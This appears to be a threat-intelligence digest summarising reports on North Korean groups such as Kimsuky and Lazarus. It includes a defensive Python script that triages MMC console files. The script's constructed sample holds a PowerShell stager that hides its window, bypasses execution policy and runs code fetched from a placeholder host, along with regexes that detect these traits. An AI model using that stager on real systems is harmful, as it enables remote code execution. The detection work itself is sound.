CYFIRMA profiles Kimsuky as a North Korean hacking group active since at least 2018 and engaged in espionage and financially motivated cybercrime aligned with North Korean state interests. The profile lists target exposure across South Korea, the United S…
2024
654 reports
Microsoft Threat Intelligence discussed two North Korea-linked clusters, Onyx Sleet and Storm-0530, with emphasis on how DPRK cyber activity mixes espionage, theft, and moonlighting-style operations. The notes describe Onyx Sleet as a long-running actor t…
Indodax lost roughly $25.22 million on September 10 after attackers initiated withdrawals across Ethereum, Polygon, Tron, Bitcoin, and other chains. Cyvers reported suspicious transactions from exchange wallets, while SlowMist assessed that the activity d…
Security Blue Team uses the KnowBe4 fake IT-worker incident to explain how North Korean operators can combine stolen identities, AI-enhanced profile images and remote hiring workflows to gain insider access. The excerpt says the impostor passed hiring che…
A Kimsuky sample named Terms and conditions.msc embeds PowerShell commands that run hidden from the user and retrieve additional content from hxxps://0x0(.)st/Xyl7(.)txt. The script uses Invoke-Expression and Invoke-WebRequest, decodes hexadecimal data in…
The Korean analysis attributes a malicious file named Terms and conditions.msc to Kimsuky and provides hashes for the MSC sample, including SHA-256 cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09. The MSC content launches PowerShell in a …
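A static triage routine for the pattern described in the two entries above: an MMC console file whose XML carries a PowerShell command that runs with a hidden window, pulls further content with Invoke-WebRequest, hands it to Invoke-Expression, and decodes hex-encoded data. This is an added example, not code from CYFIRMA, the Korean analysis or any of the cited vendors. The XML layout, the command string, the URL and the hex blob in the sample are constructed for the example and are not indicators from the report; only the SHA-256 in the IOC set is taken from the page.

```python
"""Static triage of an MMC console (.msc) file for an embedded PowerShell loader.

Added example (not the report's own tooling). The .msc structure below and every
string inside it are constructed; only KNOWN_BAD_SHA256 comes from the report.
"""
import hashlib
import re
import xml.etree.ElementTree as ET

# SHA-256 of the Terms and conditions.msc sample as published in the analysis.
KNOWN_BAD_SHA256 = {"cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09"}

# Constructed sample: an MMC console XML with a hidden PowerShell stager in its
# string table. The URL (example.invalid) and hex payload are invented here.
SAMPLE_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables>
    <StringTable>
      <Strings>
        <String ID="1">Terms and conditions</String>
        <String ID="2">powershell.exe -w hidden -ep bypass -c "$d='496E766F6B652D45787072657373696F6E'; $s=-join($d -split '(..)' | ?{$_} | %{[char][convert]::ToInt32($_,16)}); IEX (Invoke-WebRequest -Uri 'https://example.invalid/payload.txt').Content"</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
EP_BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)
IEX_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
IWR_RE = re.compile(r"\bIWR\b|Invoke-WebRequest", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+")
HEX_RE = re.compile(r"(?<![0-9A-Fa-f])([0-9A-Fa-f]{16,})(?![0-9A-Fa-f])")


def extract_strings(xml_text: str) -> list[str]:
    """Return every non-empty text node in the console XML, in document order."""
    root = ET.fromstring(xml_text)
    return [el.text.strip() for el in root.iter() if el.text and el.text.strip()]


def decode_hex_blobs(cmd: str) -> list[str]:
    """Decode long hex runs that yield printable ASCII (the 'decoded' stage of the loader)."""
    out = []
    for blob in HEX_RE.findall(cmd):
        if len(blob) % 2:
            continue
        try:
            text = bytes.fromhex(blob).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


def score_command(cmd: str) -> dict:
    """Flag the loader traits the report describes for one PowerShell command line."""
    return {
        "command": cmd,
        "hidden_window": bool(HIDDEN_RE.search(cmd)),
        "execution_policy_bypass": bool(EP_BYPASS_RE.search(cmd)),
        "invoke_expression": bool(IEX_RE.search(cmd)),
        "invoke_webrequest": bool(IWR_RE.search(cmd)),
        "urls": URL_RE.findall(cmd),
        "decoded_hex": decode_hex_blobs(cmd),
    }


def triage(xml_text: str) -> list[dict]:
    """Return one finding per string-table entry that launches PowerShell."""
    return [score_command(s) for s in extract_strings(xml_text) if "powershell" in s.lower()]


def matches_known_ioc(data: bytes) -> bool:
    """True when the file's SHA-256 is in the published IOC set."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256


if __name__ == "__main__":
    print("known IOC:", matches_known_ioc(SAMPLE_MSC.encode()))
    for finding in triage(SAMPLE_MSC):
        for key, value in finding.items():
            print(f"{key}: {value}")
```

The hash check is exact-match only and will miss any re-built sample; the string-table scan is the part that generalises, since it keys on the loader's behaviour (hidden window, remote fetch into Invoke-Expression, hex-to-text decoding) rather than on the specific file. Running it over a directory of .msc files extracted from mail attachments gives a quick first pass before detonation.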
ReversingLabs links new malicious Python packages to VMConnect, a campaign previously associated with North Korea's Lazarus Group through Japan CERT research and code similarities. The activity targets developers through fake recruiter and coding-test lur…
Unit 42 maps North Korean cyber activity to RGB-linked clusters rather than treating all public reporting as a single Lazarus label. The assessment separates Alluring Pisces, Gleaming Pisces, Jumpy Pisces, Selective Pisces, Slow Pisces, and Sparkling Pisc…
AhnLab reports a Kimsuky APT campaign targeting domestic users with decoy Word documents themed around Russia and North Korea relations. The attacker used a GitHub repository to host multiple malicious scripts and benign decoy files, with the scripts ulti…
The report analyzes a Kimsuky malware sample that the author assesses may be related to Korea University targeting. The source provides SHA-1 and SHA-256 hashes and shows heavily obfuscated command content associated with the sample. Because the available…
Genians links increased Konni campaign activity with high confidence to the Kimsuky cluster and describes continued use of spear phishing against South Korean, Russian, diplomatic, security, finance, and cryptocurrency-related targets. The activity uses s…
Mandiant describes DPRK-linked Web3 heists in which North Korean threat actors use both social engineering and supply-chain access to compromise cryptocurrency organizations and drain wallet funds. Recent cases included fake LinkedIn recruiting and coding…
Group-IB tracks Lazarus activity in the Contagious Interview campaign, where developers and blockchain professionals are approached through job platforms and moved to Telegram before being asked to run fake interview tasks or conferencing software. The in…
SentinelOne describes North Korean IT workers using fraudulent employment to enter U.S. companies, earn revenue for the DPRK, and create security exposure inside corporate networks. The report cites the August 2024 Justice Department case against Matthew …
Mandiant frames DPRK activity as a central driver of high-value Web3 theft, citing the Ronin bridge heist of more than $600 million and earlier APT38 bank-heist experience. Recent exchange intrusions used fake recruiting over LinkedIn to deliver COVERTCAT…